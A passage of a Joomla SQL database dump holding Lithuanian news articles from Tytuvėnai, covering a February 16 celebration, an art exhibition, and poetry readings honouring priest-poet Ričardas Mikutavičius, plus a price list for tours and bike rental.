background-color: #ffffff;\">120 metų Lietuvos vardo nebuvo Europos žemėlapyje. 1918 metų vasario 16 dienos Aktas paskelbė lietuvių tautos lūkesčius ir politinius siekius, tapo tautos laisvės ir suverenumo simboliu.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Kiekvienais metais Tytuvėnuose švenčiama Lietuvos Valstybės atkūrimo, Vasario 16 – tosios šventė. Šiais metais po sumos Šv. Mišių bažnyčioje, žmonės rinkosi Tytuvėnų bernardinų vienuolyno refektorinėje salėje paminėti šios svarbios valstybinės šventės. Į susirinkusius kreipėsi  svečiai: seimo narė Alma Monkauskaitė, Kelmės vicemeras Kęstutis Bilius, Kelmės administracijos direktorė Irena Sirusienė.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Buvo parodytas reportažas sukurtas Tytuvėnų gimnazijos mokinių, kur tytuvėniškiai pasakojo kaip jie švenčia Vasario 16 - tąją. Koncertą ruošė ir jame dalyvavo Tytuvėnų gimnazijos meno skyriaus mokiniai ir mokytojai, kultūros centro darbuotojai.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Smagu kai šventes kuriame patys, tai suartina, suburia kartu švęsti valstybės gimtadienį.</span></p>\r\n<p><img src=\"images/stories/naujienos/vasario16/1.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/vasario16/2.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/vasario16/3.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/vasario16/4.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/vasario16/5.jpg\" border=\"0\" alt=\"\" /></p>',1,0,0,44,'2015-02-17 13:52:53',135,'','2015-02-19 07:07:47',135,0,'0000-00-00 00:00:00','2015-02-17 13:52:53','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/vasario16\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,147,'','',1,3808,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(225,313,'Užmiršta... užmiršta?','uzmirsta-uzmirsta','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Šiemet minime 130 – tąsias dailininkės Sofijos Riomerienės gimimo metines. Menininkė piešė akvarele, pastele, aliejiniais dažais, sukūrė daug grafikos darbų. <br /></span></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Mėgstamiausias menininkės žanras – portretai. Ji nutapė K. Griniaus, A. Merkio, J. Tumo – Vaižganto, Maironio portretus. Piešė ir paprastus žmones, iki šiol tytuvėniškiai yra išsaugoję nevieną  senelių ir giminių portretą.</span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Vasario 15 dieną  Tytuvėnų bernardinų vienuolyne susirinkusiems miestiečiams ir svečiams buvo pristatyta paroda. Čia eksponuojama dešimt atspaudų padarytų nuo  Sofijos Riomerienės originalių grafikos klišių, kurios saugomos Kelmės krašto muziejuje. Taip pat eksponuojama Kuršėnų meno mokyklos moksleivių darbai sukurti pagal Sofijos Riomerienės kūrybos stilistiką ir techniką. Parodą pristatė ŠU Dailės galerijos direktorius Kornelius Užuotas ir grafikė Vaiva Koveraitė, ŠU Menų fakulteto profesorius Vaidotas Janulis. Tytuvėnų miesto seniūnas Romas Čerkauskas dėkojo menininkams už surengtą parodą skirtą garsiajai kraštietei. Tai pirmoji paroda surengta po gaisro sutvarkytoje senojoje vienuolyno bibliotekos salėje.</span></p>\r\n<p><img src=\"images/stories/naujienos/vasario16/6.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/vasario16/7.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/vasario16/8.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/vasario16/9.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/vasario16/10.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/vasario16/11.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/vasario16/12.jpg\" border=\"0\" alt=\"\" /></p>',1,0,0,44,'2015-02-19 07:01:24',135,'','2015-02-19 07:09:12',135,0,'0000-00-00 00:00:00','2015-02-19 07:01:24','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/vasario16\\/uzmirsta_uzmirsta.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,146,'','',1,3347,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(226,314,'Kvietimas  ','kvietimas-ricardo-mikutaviciaus-80-tosioms-gimimo-metinems','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Poezijos skaitymai skirti kun. Ričardo Mikutavičiaus  80-tosioms gimimo metinėms.</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><img src=\"images/stories/naujienos/mikutavicius/mikut.jpg\" border=\"0\" alt=\"\" /></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Organizatoriai:<br />Tytuvėnų gimnazija, <br />VšĮ \"Tytuvėnų festivalis\"<br />Tytuvėnų regioninis parkas<br />Tytuvėnų seniūnija,<br />VšĮ \"Tytuvėnų piligrimų centras\",<br /><br />Dėl išsamesnės informacijos kreiptis tel.8 427 562 23, e.p. info@infotytuvenai.lt</span></p>',1,0,0,44,'2015-02-24 06:06:40',135,'','2015-02-24 06:08:02',135,135,'2015-02-24 06:08:02','2015-02-24 06:06:40','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/mikutavicius\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,145,'','',1,3472,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(227,315,'Poezijos skaitymai Tytuvėnuose','poezijos-skaitymai-tytuvenuose','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Šiemet kun. Ričardas  Mikutavičius švęstų 80 – tąjį gimtadienį, deja jau 17 metų kai neturime šio ypatingo žmogaus.</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Jubiliejinio gimtadienio proga, Vasario 26 –ąją dieną, maldoje prisimintas čia eilę metų tarnavęs kunigas, Tytuvėnų bažnyčioje buvo aukojamos Šv. Mišios, kalbamas rožinis.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Tytuvėnuose – šiame mažame Žemaitijos miestelyje, kun. Ričardas Mikutavičius praleido 13 gražiausių gyvenimo metų. Čia jo nuveikta begalė darbų, bet svarbiausias atliktas darbas parapijos žmonių sutelkimas arčiau bažnyčios, kvietimas atsigręžti į Dievą. Keturių dešimtmečių senumo nuotraukos liudija – minios žmonių procesijose, spindinčios vaikų akys pirmos komunijos šventėje, ministrantų gausa Šv. Mišių metu, bažnyčios choras  - didelis keturių balsų parapijiečių kolektyvas, įspūdingas savo dydžiu ir puošnumu Velykų ryto bažnyčios interjeras. Tytuvėnuose kunigo atrasta neišsenkanti kūrybos versmė, parašytas pirmasis eilėraštis.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">2012 metais, praėjus lygiai mėnesiui po gaisro nusiaubusio bažnyčios ir vienuolyno ansamblį, sukrėtusio, supriešinusio miestelio gyventojus, kilo mintis, vasario 26 dieną, gimimo metinių proga, sukviesti miestelėnus pasiklausyti poezijos, kad kažkada visų mylimo kunigo parašyti žodžiai užgautų sielos stygas, sutelktų, paguostų sunkią valandą. Renginys įvykęs tuomet, po drėgme ir suodžiais išmargintais vienuolyno skliautais buvo tarsi preliudija į jau kelintus metus vasario mėnesį vykstančius religinės poezijos skaitymus.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Šiais metais skaitymai vyko vasario 28 dieną. Pirmą kart skaitymuose dalyvavo Šiaulių universiteto docentė, humanitarinių mokslų daktarė, literatūtos kritikė Dalia Jakaitė. Ji skaitė pranešimą tema “Pokalbis su šventaisiais kun. Ričardo Mikutavičiaus poezijoje”. Tekstai naudoti skaitymuose išsaugoti ir perduoti “ Tytuvėnų piligrimų centrui” kunigo poezijos recenzentės Teresės Sąžinienės. Tai eilėraščių ciklas Šv. Kazimierui Gediminaičiui ir kiti eilėraščiai parašyti kunigui - poetui dirbant Tytuvėnuose. Poeziją skaitė Tytuvėnų parapijos klebonas Rimantas Žaromskis, Užvenčio klebonas Donatas Klimašauskas. Skaitymuose dalyvavo tytuvėniškis Romanas Bilius, kuris kun. Ričardui tarnaujant Tytuvėnuose buvo ministrantas aukojant Šv. Mišias. Dalyvauti skaitymuose maloniai sutiko svečias iš Kretingos, pranciškonas brolis Bernardas, asmeniškai pažinojęs kun. Ričardą Mikutavičių. Brolis Bernardas rašo eiles ir yra išleidęs poezijos knygą “ Taip priėjo gyvenimas”.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Skaitymus muzikos garsais papuošė Tytuvėnų gimnazijos mokytoja Dovilė Zikienė. Vakarą vedė Nijolė Saimininkienė. Kunigo sūnėnai Arūnas ir Ričardas Kolaičiai dėkojo  už  atminimą kuris saugomas  tytuvėniškių  iki šiol.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Rengėjai  dėkingi visiems parėmusiems, prisidėjusiems ir atėjusiems pasiklausyti poezijos.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">VšĮ “ Tytuvėnų piligrimų centras”</span></p>\r\n<p><img src=\"images/stories/naujienos/poezijos_skaitymai/1.jpg\" border=\"0\" width=\"1140\" height=\"1520\" /><br /><br /> <img src=\"images/stories/naujienos/poezijos_skaitymai/2.jpg\" border=\"0\" width=\"1140\" height=\"1520\" /><br /> <br /><img src=\"images/stories/naujienos/poezijos_skaitymai/3.jpg\" border=\"0\" width=\"1140\" height=\"1520\" /><br /><br /> <img src=\"images/stories/naujienos/poezijos_skaitymai/4.jpg\" border=\"0\" width=\"1140\" height=\"1520\" /><br /><br /> <img src=\"images/stories/naujienos/poezijos_skaitymai/5.jpg\" border=\"0\" width=\"1140\" height=\"1520\" /></p>',1,0,0,44,'2015-03-05 20:09:17',135,'','2015-03-05 20:10:27',135,0,'0000-00-00 00:00:00','2015-03-05 20:09:17','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/poezijos_skaitymai\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,144,'','',1,3903,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(178,262,'Paslaugos ir kainos','paslaugos','','<table style=\"width: 100%;\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\"><strong>Eil. Nr.</strong></p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p align=\"center\"><strong>Paslaugos pavadinimas</strong></p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\"><strong>Mato vnt.</strong></p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\"><strong>Kaina (</strong><strong>€)</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">1.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Bilieto kaina <em>(suaugusiam žmogui)</em></p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 asm.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">5,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">2.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Bilieto kaina <em>(vaikams, senjorams, neįgaliems)</em></p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 asm.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">3,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">3.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Gido paslaugos (lietuvių kalba) iki 10 asm.</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 vnt.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">20,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">4.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Gido paslaugos (lietuvių kalba) iki 11 asm. ir daugiau</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 vnt.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">30,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">5.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Gido paslaugos (užsienio kalba)</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 vnt.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">40,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">6.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Gido paslaugos po rajoną</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 vnt.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">50,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">7.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Bilieto kaina po Tytuvėnų miestą <em>(suaugusiam, vaikams, senjorams, neįgaliems)</em></p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 vnt.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">6,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">8.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Naktinė ekskursija (sezonas 2024 10 – 202 04)</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 asm.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">10,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">9.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Dviračių nuoma</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">24 val.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">12,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">10.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Dviračių nuoma</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">8 val.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">9,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">11.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Dviračių nuoma</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">3 val.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">6,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">12.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Dviračių nuoma</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 val.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">3,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">13.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Edukacinė programa „Trys Dievo dovanos ir kiti kvapai“</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 asm.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">5,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">14.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Edukacinė programa „Trys Dievo dovanos ir kiti kvapai“ su sūrio degustacija ir arbata</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 asm.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">7,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">15.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Edukacinė programa „Mažas šulinėlis, juodas vandenėlis...“</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 asm.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p 